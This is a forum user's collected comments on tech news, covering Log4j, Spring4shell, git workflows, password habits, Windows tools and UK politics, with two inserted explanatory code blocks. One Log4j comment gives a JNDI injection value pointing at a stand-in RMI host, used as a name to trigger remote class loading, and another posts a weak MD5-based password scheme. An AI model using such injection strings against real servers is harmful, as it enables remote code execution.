* Posts by malfeasance

63 publicly visible posts • joined 1 Sep 2009


GitHub struggles to keep up with automated malicious forks


Attack Vector/Scope of the attack

I read the article on arstechnica and a few things didn't sit right with me.

1) The example shows python as the language, with the poisoned payloads being present in the source code of the projects

2) That implies to me, the attack vector is people used to stackoverflow that blindly copy and paste code into their own projects.

2.1) These projects don't seem to be published into a public registry since they have the same name.

2.2) People dissing github for allowing them to use the same name aren't really on the money because a fork is a fork, and a fork inherits the same name and your "user-id / org" gives it a namespaced scope in github.

3) There is nothing of course to stop the bad actors from publishing to ghcr.io under their userid/org and then doing a poison supply chain attack.

3.1) If I need to publish to maven central then I need to jump through a couple of hoops before I'm allowed to publish to the "com.myorg" group; I'm guessing that PyPI or similar don't have such restrictions.

I genuinely don't know what to think of this.

Can someone help me understand precisely how this is a bigger problem than Caveat Emptor if you're just cutting and pasting shit from the web? (which is a big problem, but a _people problem not a technology problem per se_ )

Microsoft embraces its inner penguin as sudo sneaks into Windows 11


I genuinely thought it already existed

Then I realised that I have it installed via scoop which resolves to this:


Former Post Office boss returns CBE to sender over computer system scandal


Re: A scandal of epic proportions

What's galling is that Computer Weekly (? I forget the name of the trade paper) & Private Eye both shone a light on the scandal repeatedly and it was brushed under the rug. Also, didn't Panorama have an investigative show on it?

This is a punching problem; where the families of all those affected get to punch Fujitsu & Vennells repeatedly until we have a different type of problem. (Violence is not the answer of course, but money and exoneration isn't going to give any _real closure_ to some of those affected).

Microsoft touts Visual Studio Code as a Java juggernaut


So, I made the decision to move my dev environment 'into' WSL2 from NTFS (recently) because python, node, ruby are also things I'm working with as well as rust + java.

IntelliJ on Windows, for all its support for WSL2, didn't play nicely on my machine and essentially all gradle projects that are now in WSL2 break with a "can't find a main-class org.jetbrains.something.or.other.gradle.tooling.Proxy". It was just meant to work according to their docs; searching for the missing main class didn't give me much help either since I'm running the latest IntelliJ community edition.

I have moved to vscode (java+rust); running vscode with the WSL remote server or whatever it is has been frictionless, and the java & rust projects 'just work' in the manner that I expect them to.

'yeah but, you could run WSL2 in Wayland mode, and install IntelliJ like that', or 'mutter some arcane invocation that magically has some kind of setting that makes it work'; I'm just fighting against the tooling by then, which stops me from getting actual shit done.

Linus Torvalds to kernel devs: Grow up and stop pulling all-nighters just before deadline


Re: Err

Sounds like you're reading into it as though Mr T is (already) having an apoplectic fit. That's not how I'm reading it, so we can agree to disagree about that.

He's given us fairly clear direction as to his expectations about the merge window; do it early so he has time to review code and understand the wider ramifications of it (if any). If we choose to still give him our merge requests in the way he finds disappointing (merge-window-close - 1) then we won't get the best experience and shouldn't be surprised if things don't go our way.

Anyone vaguely related to a release process will have seen the pain of seeing someone commit a change on the release branch late in the day before go-live. It generally doesn't end well.


Re: Err

You have a merge window, and because you're a kernel dev you know when it's gonna start. You can submit your merge requests on (merge window start +1) or you submit your merge requests on (merge window close -1)

Which of these is going to get you the best experience out of your interaction with Mr T; he who has been known to pity the fool?

I don't think that what happens after the merge window closes is relevant to the point that Linus is making; "punctuality is the courtesy of kings" and all that.

Logitech Zone Vibe 125: Weightless comfort on the ears that won't break the bank


Re: Comfort?

Almost certainly alluding to the fact that their experience doesn't match his, and because of reasons, he must be wrong, because we are a homogenous lived experience now, big tech tells us so.

(I've already demonstrated that by referring to Charlie as a he, when I don't know them)

Headphone style is a weird one, the people that swear by over-ear headphones probably don't suffer from (or at least aren't bothered by it).

- Having to wear glasses like Charlie (and myself).

- Getting really hot ears from the over-earness of the headphones. Personally, I haven't found a pair of over-ear headphones that I can wear for longer than 30 minutes.

- On ears are better, but still not great

I get on with in-ears quite well, and from a "mobile headset" point of view I'm a big fan of the Bose QC earbuds, and the Sony WF-1000MX3 (or MX4) in-ears. 2 pairs because if you go on a flight longer than 6 hours...

However, from a usability point of view, earbuds are pointless in an office environment because the pickup from the mic broadcasts everything (by office environment, my home office is 2 person, and when you're both on calls it doesn't end well).

If it's purely for remote working then I would go for the aeroshokz/aftershokz opencomm, bone conductors with mic.

It's in the same price range as these, I can wear them all day, I can hear the doorbell when the postman comes, and for me, the mic is on the correct side of my face (I sit to the right, which means the mic hanging off the left ear makes a difference in sound pickup)

Back-to-office mandates won't work, says Salesforce's Benioff


Because ultimately you are paying for skills. The company is effectively leasing the knowledge that you have in order to do the job that they need doing.

If you want someone for 30k from Elbonia, by all means go and get them; but what's the opportunity cost to the business by doing that?

I don't believe that programmers are fungible, that's a whole load of nuance that would need quantifying before you can go down the "programmers are interchangeable cogs in a production line" (which is the ultimate expression of what you've said).

It's our own fault that we liken development/programming as though it were a production line; that's never truly been the case.

Patch now: RCE Spring4shell hits Java Spring framework


Re: Whose?

To quote some analysis about this CVE (veracode) you need to be using

Spring Web MVC or Spring Webflux projects AND

Spring Framework version 5.3.x prior to 5.3.18, and all versions prior to 5.2.20 AND

Java 1.9 or above AND

Deployed on Tomcat App Server as a WAR AND

Spring Web MVC with parameter binding (enabled by default) AND

Don’t have an allowlist of HTTP fields registered to be allowed or explicitly disallow fields which could cause malicious intent.

The interaction between all those components is unlikely to be covered by a unit test, so it's somewhat disingenuous to mention it. It would have to be an integration test that needed to be done by the Spring team using things that are outside of their control.

I would note here that if you're a vanilla spring-boot user then you're not vulnerable to this particular RCE.

Apache takes off, nukes insecure feature at the heart of Log4j from orbit with v2.16



There's always a problem with being able to lookup serialized binary objects across a network. Yes, JNDI RCE is a problem, because it's little bobby tables, so the application needs to do verification of user input just like always.

8u191+ disabled by default the ability to inject classes (e.g. I don't have the class this object refers to, could you give it to me?). However, it is still possible to achieve the same thing if you have a class that's vulnerable already on the classpath.


I mean the obvious example is going to be a lookup via LDAP for my identity, if I were to change my name to "rmi://example.com:10977/dodgy" and the login page ended up calling InitialContext.lookup with my dodgy name (and the server was allowed to open up external connections...)

Log4j doesn't just blow a hole in your servers, it's reopening that can of worms: Is Big Biz exploiting open source?


Re: JNDI concerns

And yet they have done it with extreme prejudice haven't they, they've taken option-b and rightly so, but the decision to enable it by default is basically down to the Apache committer.

If you look at the log4j jira and search for the original ticket (https://issues.apache.org/jira/browse/LOG4J2-313); the use-case seems reasonable on the face of it. With hindsight "we can all say, there's no way that's secure, don't be soft!". But, think about the sea change in security perspective in the intervening 8 years. How many of us employed by corporates have now been on mandatory secure-by-design training. If you've been with the same company for a while, when did the powers-that-be mandate it? (I suspect it was post equifax...)

Developers are ultimately lazy and haven't been forced to have the discipline to consider all the side-effects of their changes on the entire system.

To take a case in point, the javax package move to jakarta is one that irks me, because they've broken backwards compatibility in a completely nonsensical way. jakarta.mail.jar contains some "com.sun.mail" packages in situ, but have renamed all the javax.mail -> jakarta.mail. There's a circular dependency in one of the classes (a com.sun.mail class now takes a jakarta.mail class; this conflicts the same class that might have been provided by javamail-api.jar, because method signatures right)

They committed the change, the unit tests passed, so they released jakarta.mail-2.0.0, because the unit tests passed 100% code coverage. It's all good.

There are a lot of things out there that still depend on javax.mail.*, but this means that you can't include javamail-api-1.6.2.jar and jakarta.mail-2.0.1.jar in your classpath. Backwards compatibility is now broken irretrievably; there will be projects that pull an open source library that is orphaned (but serves its purpose) that depends on javax.mail (because javax.mail.mime isn't awful) and they can't upgrade to jakarta.mail to take advantage of security updates because they need working software.


Re: JNDI concerns

Enabling it by default was a choice made in a kinder, gentler age. That was the decision; turns out it was a poor decision viewed through the prism of what we know now.

Once something is "in production" then backwards compatibility should be a goal. Breaking users' expectations isn't something that should be done lightly, which means that the status quo and inertia are quite a big anchor.

Microsoft releases command-line package manager for Windows (there are snags)



I’ve always found scoop.sh to be more useful than chocolatey.

Malwarebytes says its Office 365, Azure tenancies invaded by SolarWinds hackers, insists its tools are still safe to use


Depends on the documentation

There might be perfectly reasonable design decisions as to why Microsoft did that. Equally there might not be (Microsoft aren't going to tell us either way are they).

If you have documented prominently that "anyone can gain access to AD as a domain admin by doing this. If you want to stop that then do this this, and this. This has the known side effect of causing this behaviour..."

Isn't that documented well enough (if prominent enough) such that the customer can make a judgement call about it? Everything's a trade-off isn't it, and I presume that MalwareBytes made that trade-off...

Linus Torvalds rates his own words 'incoherent ramblings of a crazy old man'


Re: His classes are working

I don't think it's the classes.

Linus has historically (been | appeared to be) the type of person that can admit when he's wrong. It's just that he's not often wrong in the things that he's the subject matter expert in (you know, like the kernel). I think there's a phrase "Strong opinions, weakly held" that could be used to describe him.

Even with a 49% uplift in sales and a 46% drop in expenses, Slack still can't turn a profit


Re: No need for Slack

The one thing that slack had over ms teams for a while, was the fact I could "join different organisations" slack workspaces in the same UI instance;

That wasn't great in teams, possibly still isn't, but I haven't needed to use it in anger recently.

Anecdotal evidence shows me that slack really suffers in the context of "it doesn't behave well with other applications"; my other half is always complaining that slack sucks her CPU (5-10 different workspaces) and bandwidth.

How generous of GitHub to slash prices and make all its core features free. So what gives? Oh right, GitLab


It might hurt bitbucket more.

I'm in the "lovely" position of using github (for opensource), gitlab (on-prem hosted), bitbucket (because we were using this before we were acquired, paid-for-private stuffs); oh, and some of the stuff on github is mirrored into gitlab.com.

We were all about (pre-acquisition) "use my own infrastructure" for doing the CI/CD; whether that's circleci/appveyor/travis-ci/my very own jenkins or whatever. In fact I have circle-ci/appveyor/github-actions/travis-ci set up for most of our opensource projects to at least run tests: mainly because we can, but also because using multiple pipelines means that when we have intermittent network-y style failures we can eyeball the PR and still approve it. If 3 out of 4 work, then it's probably an isolated problem that will eventually go away... if none of them work, then we know it's a regression.

The org itself is in the process of standardising on gitlab on-prem; which means that we were going to move bitbucket into gitlab on prem; but now, we probably won't bother, we'll just move all the existing BB repos into github as private repos, since the opensource stuff will have to live somewhere...

Atlassian can't ignore github or gitlab, so jira/trello will always almost certainly have connectors for them; bitbucket may end up becoming unloved.

Microsoft attempts to up its Teams game with new features while locked-down folk flock to rival Zoom... warts and all


Re: More than four concurrent videos

I regard Teams as primarily a business tool; my line in the sand would be: If you have > 4 people in a meeting, it's not a meeting anymore; it's just a hot-air balloon being inflated.

Sure; I get that stuff is nuanced, but for most business use cases, Teams will work fine (as will any of the other tools).

I've worked remotely for nigh on 20 years, and after the novelty of it all; it's all about asynchronous communications; it's all about being precise in your communications (bearing in mind all the filler words that English has and how useless they are, relatively speaking - look I've used a bunch in typing this comment).

It's nice to have a choice isn't it?

Hapless AWS engineer spilled passwords, keys, confidential internal training info, customer messages on public GitHub


so-called engineers that don't understand the tools they use

You're bang on, seen that so many times; which is confusing since you can easily have an excludes file in your ~/.gitignore a-la


excludesfile = /home/user/globals/gitignore

And then in that gitignore file have a "__localonly" line; this means, doesn't matter what project I'm working on, I create a __localonly directory and stuff all the hard-coded nonsense in there.

Never gets checked in, never gets pushed, doesn't ruin anyone else's pristine filesystem...
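As an added example (not the commenter's code), the setup described above, scripted end to end: the global excludes file with a single `__localonly/` pattern, pointed at by `core.excludesfile` (a `[core]` key in the global git config, set here with `git config --global`), then a check in a fresh repository that a hard-coded secret under `__localonly` is neither reported as trackable nor staged by `git add -A`. All paths are constructed; the script runs under a temporary HOME so the real machine's git config is untouched.

```shell
#!/bin/sh
# Added example: a global git excludes file that ignores any "__localonly"
# directory in every repository, so hard-coded credentials kept there are
# never staged or pushed. Assumes git is installed; all paths are constructed
# under a temporary directory.

# Write the global ignore list for the given HOME and register it as
# core.excludesfile in that HOME's ~/.gitconfig. Prints the ignore list path.
setup_global_excludes() {
    home_dir="$1"
    mkdir -p "$home_dir/globals"
    # One pattern, as in the comment: any directory named __localonly.
    printf '__localonly/\n' > "$home_dir/globals/gitignore"
    HOME="$home_dir" git config --global core.excludesfile "$home_dir/globals/gitignore"
    printf '%s\n' "$home_dir/globals/gitignore"
}

# Create a throwaway repository with a constructed secret under __localonly
# and report whether git treats it as ignored.
# Prints "ignored", "tracked" or "git-missing".
demo_localonly_ignored() {
    command -v git >/dev/null 2>&1 || { echo git-missing; return 0; }
    work="$(mktemp -d)"
    home_dir="$work/home"
    setup_global_excludes "$home_dir" >/dev/null

    repo="$work/project"
    mkdir -p "$repo/__localonly"
    HOME="$home_dir" git init -q "$repo"
    # Constructed sample: the kind of value that must stay on this machine.
    printf 'API_TOKEN=placeholder-not-a-real-token\n' > "$repo/__localonly/env.local"

    # check-ignore exits 0 when the path matches an ignore rule.
    if HOME="$home_dir" git -C "$repo" check-ignore -q __localonly/env.local; then
        result=ignored
    else
        result=tracked
    fi

    # Belt and braces: "git add -A" must stage nothing from __localonly.
    HOME="$home_dir" git -C "$repo" add -A
    if HOME="$home_dir" git -C "$repo" ls-files --cached | grep -q '^__localonly/'; then
        result=tracked
    fi

    rm -rf "$work"
    echo "$result"
}

# Run the demonstration when executed directly.
demo_localonly_ignored
```

Because the pattern lives in the global excludes file rather than the repository's own .gitignore, it applies to every clone on the machine without appearing in anyone else's history.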

Female-free speaker list causes PHP show to collapse when diversity-oriented devs jump ship


Isn't this just the market deciding?

I have no idea how good PHP.CE was/is as a conference; but they've organised speakers; and some of those speakers have pulled out.

As a result of those speakers pulling out, ticket sales dried up (which obviously tells us something); and it's no longer viable as an entity.

Thus the market hath spoken... (and the market might be wrong, but it hath spoken).

Bordeaux-no! Wine guzzling at UK.gov events rises 20%


Re: Canada?

Yes, Ice Wine. Might not be your bag if you don't like dessert wine, but it's a wine; some think it's fine.

Perfect timing for a two-bank TITSUP: Totally Inexcusable They've Stuffed Up Payday


The last friday of the month

Is generally payday; so yeah, this is aggravating on a lot of levels for a lot of people

Now, I am not trying to defend HSBC; but isn't this the "first" time that HSBC mobile/web banking has gone away for an extended amount of time? If you regard the time difference between the twitter post 0749 and the first PR response 0830, let's give it at least a couple of hours before PR spin is actually true; then a reasonable expectation is that by 1100 we're in a vaguely working state. That isn't awful...

I know that collectively we are impatient and we want to know what we want to know right now; but it's a bit like the "looking at the finger pointing at the moon".

I have accounts with most of the high street operators; HSBC isn't even close to the most unreliable of them; mind you, I am not of the ilk that wants to manage all my accounts on my phone whenever the whim takes me (seriously, why have the temptation to make a payment when you're down the boozer setting sail for shores unknown). Set an IFTTT to remind you to pay the man, when you walk within 50 metres of your house...

Linux kernel's 'seat warmer' drops 4.19-rc5 with – wow – little drama


The road to hell...

is paved with good intentions is probably the epithet that springs to mind; or if we can go straight for a godwin-esque reference, that poem by that pastor Niemöller?

The western world is quite male, pale and stale (I only fit 2 of those criteria); and from a purely objective and rational standpoint, what some of the code-of-conduct stuffs tries to do is quite worthy. But then as soon as people get involved it gets into a right old mess of prejudice and bias and we end up giving airtime/attention to the loudest shoutiest people.

If the GPLv2 developer consent killswitch does apply; then surely the answer is to fork RC4 *right now* (however that needs to be done); and then you have a copy that you're free to have "people who are now persona-non-grata" contribute to it. You can probably even merge the mainline kernel yourself w/o too much trouble[1].

[1] - If you can't then should you even be worrying about the CoC; there's not an awful lot you can do. You'll just have to trust that the kernel remains "good enough" even with the thought police on every corner.

Extract, transform, load? More like extremely tough to load, amirite?


Re: Eh?

Sure, but the software provided by one of the data integration vendors could work in both an ETL way, and an app integration way. You're then using the same piece of software to achieve 2 very different end-goals with presumably some level of improved supportability/providing more business value. If that's good enough; then excellent. If not, then that's fine too.

Saying that ETL/App integration are intrinsically a different class of problem to each other doesn't seem right, but then I'm just a programmer.


Re: Eh?

I think the point that Trevor is making is that whether it's ETL, or API integration, it's just data integration (though I liked the repurposing of the EDI acronym).

You configure Jira to push its updates to a URL, the listener on that URL takes the Jira JSON data and turns it into a MS Teams MessageCard, and posts it to one or more MS Teams endpoints; what is happening behind the scenes is an extract, a transform, and a load. In this case sure, the extract is a push, but it's not beyond the wit of man to change that listener so that it polls a URL on a schedule etc. etc.

Apple, if you want to win in education, look at what sucks about iPads


@Ralph76 - Surface Pro is a domain aware tablet...

Erm, it's called a surface pro; it is exactly what you asked for, a domain aware tablet with a keyboard... It's just very pricey and thus not an option for the state system sadly.

The school my daughter goes to (it's a fee-paying school, goes from 5-18; Surface Pro use starts at Yr 5 (~9/10)) has mandated surface pros; along with the whole Office 365 buy-in. Having seen how they're using OneNote and all of that to distribute homework it is a big step forward in terms of managing that aspect of schoolwork.

They use the stylus to annotate the notes / material, and to do the homework; homework is auto-synced, and just "done". The STEM subjects all use the technology quite well I think. The artsy subjects not so much but submission for homework can always be electronic at least.

Installed Python for CS - I did ask the CS teacher if we could just use the ubuntu WSL but she specifically wanted Python 3.6 (I know I can get it on the ubuntu WSL, but there is probably no point being that annoying for the sake of it).

I have issues with how the IT guys have set it up (badly); but overall the decision on surfaces is a darn sight better than the previously announced (but never followed through) mandate to use ipads. The expected lifetime of the surface pro is ~4 yrs.

Stack Overflow + Salary Calculator = your worth


Unrealistic. Of course.

What are your motivations for doing Dev? If it's money then I would venture to suggest you're in the wrong job.

If it's to work on interesting problems with the people who think like you and make it fun, then rock on, you're in my team (My corporate will burn you but I still want to work with you).

Five ways Apple can fix the iPhone, but won't



How about stopping apps/javascript from pausing/muting the music / podcasts app.

Commuting and listening to some 'weird shit jazz'; happen to go to the guardian home page. Oh look the tunes are paused cos you have some shitty video you might want to play.

At least a pop-up to say. You know what, this website has media. Yes/no? Searched thru safari settings and nothing obvious.

Continuous integration platforms are broken – here's what needs fixing


CI is just software development in disguise

CI accrues technical debt just like any software development exercise; you made a choice to do things one way, it turns out less optimal than you wanted, so you either gaffer tape it or you rewrite...

We have a situation where we're building our application + modules as rpms; base.rpm + opt-a.rpm + opt-b.rpm and so on. So you can just install all the stuffs with our custom yum repos via puppet etc.

It's working quite well with their initial use case; and it's a hell of a lot better than what they had before (i.e. no CI at all)...

However, what the CI people haven't quite grasped is that opt-a.rpm might have conflicting dependencies with opt-b.rpm; it's entirely possible that if we need to install base + opt-a + opt-b, it might not work because we're still in package dependency hell (and thus was it ever like this, with DLLs, jar files etc).

The pragmatist in me wanted the CI to happen, what we have is better than what went before; but now they have got their toes wet, we all need to revisit the solution and sort out the technical debt.

Fat chance of that and so the story goes on...

Anti-TV Licensing petition gets May date for Parliament debate


For the public good

The question is really: is a public broadcaster like the BBC considered a public good? If it is then we should pay for it. Much like we pay for schools, the NHS etc. Plenty of people have no kids and still pay for schools because they know it serves a greater good.

Do I think that the BBC is worth paying for absolutely yes. The Aussie state broadcaster is fucking awful as is the Irish one.

What do I get from something like 'In our time'. Nothing; but something like it needs to exist.

Two words, Mozilla: SPEED! NOW! Quit fiddling and get serious


Re: Firefox unloved by mozilla


Printing - when everything else can do it, and FF can't; rightly or wrongly; I'm going to blame FF. Life is too short to try and investigate that kind of misbehaviour, I'll just use another browser, login to a.n. site, and print my order conf.

Proxy networking : If I lock things down so that nothing is allowed to make 80/443 connections bar the proxy, FF *cannot browse the web*. Edge can, as can Chrome (as this also has use system-proxy settings checked).

I have to physically check the "auto-detect proxy settings for this network"; at which point it goes through the wpad resolution chain - I can see this from the DNS logs...

The configuration of my dhcpd instance appears correct; after all everything else works correctly; it's just FF.


Firefox unloved by mozilla

Firefox is still my main browser out of habit rather than anything else if I'm being honest. I swap between all three browsers (edge/chrome/ff) depending on what I'm doing.

I'd agree with others that firefox is unloved by mozilla. The two most common gotchas that I'm hitting constantly are:

1) FF cannot print on Windows 10 x64 pro. Chrome can, Edge can. That's all 3 printers that I have configured, 'a real printer', 'MS print to PDF', 'MS print to OneNote'. Just WTF!

2) FF cannot use "system proxy settings" : I have a proxy that is defined by the dhcp server using the wpad directive. Does FF use it ? nooo, I have to switch to "auto-discover proxy" or some shit which is just plain daft when everything else manages to find "http://proxy.malfeasance.towers/proxy.pac" correctly.

Admittedly all the mobile devices suck with proxy detection; windows phones just "work" surprisingly without any wifi network settings modifications.

New PayPal T&Cs prevents sellers trash-talking PayPal


Re: Ummmm...

The Mrs suggests go cardless or stripe as your payment processor. Anything is better than the foetid pile of ordure that is PayPal

Android Wear: The bloatware that turned into gloatware


Vector smartwatch

Fitbit bought vector in Jan sadly. These guys would have been your new smartwatch provider. 30 day battery at least. Notifications. Music. Activity tracker of sorts.

Nice looking timepiece; as in looks like a watch not some plastic tat.

Even windows mobile compatible for the 10 people still with lumias.

'F*cking crap' aside, Linus Torvalds says Linux 4.9 is coming along nicely



Isn't that primarily the Docker union FS thing?

Which given Docker's exemplary support for backwards compatibility; I'm not entirely surprised that Linus has gone off on one.

Microsoft Surface Book: Shiny slab with a Rottweiler grip on itself


Re: The Dance while you wait to get permission to remove a drive/device


I suspect you have some kind of indexing / search turned on for your USB drives; so windows probably isn't wrong, just you have no idea what is using the drive.

My boss gets this whenever he doesn't turn off spotlight (mac) for USB keys; he's made a few of mine "not well" even though he says he always clicks the eject button.

Kaspersky says air-gap industrial systems: why not baby monitors, too?


Re: Connection nagging

Happens all the time. I have "mobile data" turned off for all non-essential apps on my iPhone (it's enabled for the web-browser, mail and probably the Maps app).

So, if I'm not connected to WIFI then often this kind of thing happens:

1) Start the music app (the built in apple one; nothing fancy).

2) A big notification that you have to OK / CANCEL : Mobile data is not enabled for this application (you can't use the app until you dismiss the notification)

3) Spot of name calling as to why a fucking music app needs access to the intertubes (yes I know it's to encourage me to buy tunes from the store; who in their right mind would do that over 3G ???).

Microsoft's Surface 3 is sweet – but I wouldn't tickle my nads with it


Re: Why Why I always asked myself for Surface

I have a surface 3 pro; and while I don't love it, it is a tool I use most days (I'm a dev by trade). I probably could have bought a surface 3 given my use-case.

1) It's lighter than my laptop (so going to visit customers is generally easier).

2) It is a duplicate of my laptop when it comes to source code / git / mercurial etc. My whole build environment is available.

3) It works adequately on my lap (in front of the TV style; if I need to do work, then yes, I'm the type that goes and sits at a desk). The type cover is pretty good to type on.

4) Wireless Display Adapter (though this isn't necessarily limited to having to use a Surface) for presentations...

5) The pen is excellent for taking notes, and (if you have trained it) then converting handwriting into text.

6) "Signing PDF NDA" without having to print the damn thing (yeah, this is a marginal use case).

7) While not exactly cheap; it's comparable to the price of a decent ultrabook (I spec'd out an 8GB/256SSD at the time)

The furore over the Win7 interface vs Windows 8 does bemuse me; the difference between the interfaces has never bothered me; I find the start menu navigate to "programs" the slowest way to start a program; I've used launchy since ~2011 so I just use that, I haven't touched a start button since then. Metro has its uses as well; though I tend to end up on the desktop because cygwin / putty.

Brute force box lets researchers, Cops, pop iDevice locks


@Phildude Re: So just switch to a strong password that's just numbers?

iOS devices only mentioned. But if we were to consider Android; if I enable "a passphrase" and I only use a numeric password; what does it present you with. If it's a full keyboard, then in this regard, iOS has it "correct for my usage model" (got fat fingers see, and a numeric keypad is better for that...).

Also, the article mentions that the brute force flaw bypasses the rate limiting and wipe device settings; I have my iPhone set to "wipe" after 10 attempts... By the time I got to the 7th or 8th failed attempt I was waiting ~2hrs for the next attempt (I tested this myself); so the back off delay you mention is already there and has been bypassed through use of this flaw.


So just switch to a strong password that's just numbers?

I've never understood why people go for a simple "PIN" unlock when it's just easy to have a strong password that's just numbers.

You still get a number pad; but there's no restriction on length. It's just as easy to use as the PIN unlock.

It can still be 4 characters if you want (but the 17hour brute force means you should reconsider that).

The BBC wants to slap a TAX on EVERYONE in BLIGHTY


Everyone in the UK consumes BBC output.

Everyone partakes of BBC output; those of you that say "i'll just watch it on catchup/another channel" are missing the point; if we didn't pay for the BBC, then in all likelihood that program would never have been commissioned. In some respects, the BBC license fee is worth it just for the David Attenborough stuff, or perhaps In Our Time.

By having a stable income stream, the BBC should be able to take risks and make TV that might be worth watching and serve a public good. Yes, I wish that they wouldn't put on so much stuff I don't like, like Eastenders, Strictly and all that other tired nonsense; we can argue that it isn't taking risks and creating worthwhile TV, but that would be to conflate 2 separate arguments.

If you go down the road of "I don't use it, so I don't want to pay for it", then you'll end up with the situation where a 22-50yr old doesn't have to pay for the NHS (because they're very unlikely to use it); ditto the childless with the NHS / Education and all that other stuff that we all know we should contribute to; and besides have you seen the crap that's on ABC (aussie)...

Think of it like the James Webb Space Telescope; it's been in "development" for about 20 years now, and isn't going to get launched for another 3-5... If NASA didn't have a steady income it would never have been able to plan and execute on a 25 year schedule.

UPGRADE your CHILDREN with KANO: All you need in one box


Re: I thought this was going to come with

Also Kickstarter; with a t-shirt. It is self-assembly, in the sense that my 6 year old snapped together all the parts, Lego style.

When we opened the box, I had to tell her how to hold the mobo, and how to plug in all the bits (picture instructions in the book). It was all her though.

The OS that's shipped auto-boots into a desktop that is geared towards the young'uns; you get pong (http://pong.kano.me), snake, a Minecraft learning game (this appeared to cause a reboot on our Pi, suspect overheating), and a couple of other bits and bobs that we haven't got round to.

It's a bit overwhelming plugged into our living room TV, so I may have to plug it into one of the spare monitors (this is just a distance from screen/size of text thing).

Scottish independence debate: STV player flops under weight of viewers


Re: Std Dirty tricks by tory boys of the westminster clan

Right... If in doubt suspect a conspiracy. Isn't it always the case that for these new-fangled-debate things each of the broadcasters gets a bite of the cherry? Last night was ITV (STV as the franchise owner), in a couple of weeks BBC will have a go.

Given that the current bunch of numpties can't do anything very well; a conspiracy wouldn't be my first choice.

If you're a so-called cybernat, then do kindly go away.

Top Ten 802.11ac routers: Time for a Wi-Fi makeover?


ADSL, VDSL built in / requires modem

More info required; it's all well and good you're testing the wireless speeds, but surely one of the other considerations is whether the model has ADSL / VDSL built in or requires a cable/VDSL modem.

Hard to tell without going to each and every manufacturer page, (fritzbox, buffalo, tp-link excepted).

Perhaps just a quick comparison table at the end rather than showing us the somewhat pointless "user-interface" screenshots.

Personally I don't care much about the snazziness of the UI, but maybe I'd like to know if I can have more than 1 wireless LAN with different network settings hosted on the same unit.

ARG! A GHOST SHIP! Pirates sunk by UK cops return from watery grave


Pointless DNS removal

We all know that there are other torrentz TLDs; why did they even bother?

Try the Switzerland or the Montenegro TLD; both work instead of the .eu TLD.

Yeah, I know it's largely a rhetorical question, they must be seen to do something, anything, to appease their copyright masters.

Good news: 'password' is no longer the #1 sesame opener, now it's '123456'


echo -n $1 | md5sum | xxd -r -p | base64 | cut -c1-10

Choose a celebrity that's died recently, a song lyric, favourite poem. Done.

For non-important websites (like this one), forums, twitter, whatnot. My password is a dictionary word, with this applied. Easy to remember; I don't check websites unless I'm on a trusted machine...
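To make the pipeline in the comment above concrete, here is an added Python re-implementation of it (not the commenter's own code): MD5 of the word, the raw digest bytes that `xxd -r -p` reconstructs from the hex, base64, then the first 10 characters. It also puts a number on the scheme: the output looks like 60 bits of base64, but because the transform is public and deterministic its strength is bounded by how many candidate input words exist. The sample word list and the 170,000-word dictionary size are constructed assumptions for illustration.

```python
import base64
import hashlib
import math

# Constructed sample inputs (hypothetical; they stand in for "a dictionary word").
SAMPLE_WORDS = ["password", "attenborough", "cantonese", "torrent"]


def derive_password(word: str, length: int = 10) -> str:
    """Equivalent of the posted shell pipeline, stage by stage:
       echo -n WORD | md5sum   -> hex MD5 digest of the word
       | xxd -r -p             -> the 16 raw digest bytes
       | base64                -> 24-character base64 text (22 chars + "==")
       | cut -c1-10            -> the first `length` characters
    """
    digest = hashlib.md5(word.encode("utf-8")).digest()
    return base64.b64encode(digest).decode("ascii")[:length]


def output_bits(length: int = 10) -> float:
    """Apparent strength if the output were random: 6 bits per base64 char."""
    return 6.0 * length


def effective_bits(wordlist_size: int) -> float:
    """Actual strength: the mapping adds no secret, so guessing the input
    word is sufficient; strength is log2 of the number of candidate words."""
    return math.log2(wordlist_size)


if __name__ == "__main__":
    for w in SAMPLE_WORDS:
        print(f"{w:14s} -> {derive_password(w)}")
    # 170,000 is a constructed, round figure for an English word list.
    print(f"looks like {output_bits():.0f} bits, worth at most "
          f"{effective_bits(170_000):.1f} bits for a 170k-word dictionary")
```

Run it directly to see the ten-character outputs; `derive_password("password")` gives `X03MO1qnZd`, which is the first ten characters of the well-known base64 form of MD5("password"). The two `*_bits` functions make the point the comment glosses over: a 10-character output and a 4-character one derived this way are equally strong if the attacker's guess is the input word rather than the output.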

Rotten hackers feast on mouldy Java flaws


Java isn't secure, but then nothing ever is.

Let's be honest now, the only vulnerable system with java installed is one that has the public JRE runtime (which I think will install the browser plugin) installed.

I have Java installed (after all, I am a Java developer); and with *just the JDK* installed, and no browser plugins, there isn't an attack vector other than programs that I explicitly download and run (there will be no getting around my stupidity).

So the question isn't whether Java is "insecure"; it is, but then so's every complex computer program that's ever been written; the problem is the *shit* that Oracle chooses to bundle with it and how Oracle chooses to deal with that...

Bill Gates offends Koreans after sticking hand down trousers


Re: Quite

Hmm, it's not really that apparent you know, cultural and social norms will have an impact on how the language is used.

If you want to take a transaction in a coffee shop as an example, all the Americans that I know and socialise with would say something like "Coffee, thanks", whereas the Brits would say "Coffee, please"; in Cantonese I would say: "Coffee, thank you".

So, it may seem to a Brit that the Yank isn't being polite, but he is; he just doesn't use the word please, nor do the Cantonese (I've personally never used "please" when I speak Cantonese; I'm not even sure there is a word that fits that concept).

From the point of view of transactional efficiency, it's actually far more efficient for you to say thank-you beforehand, rather than to say please, and then waste time saying thank-you afterwards...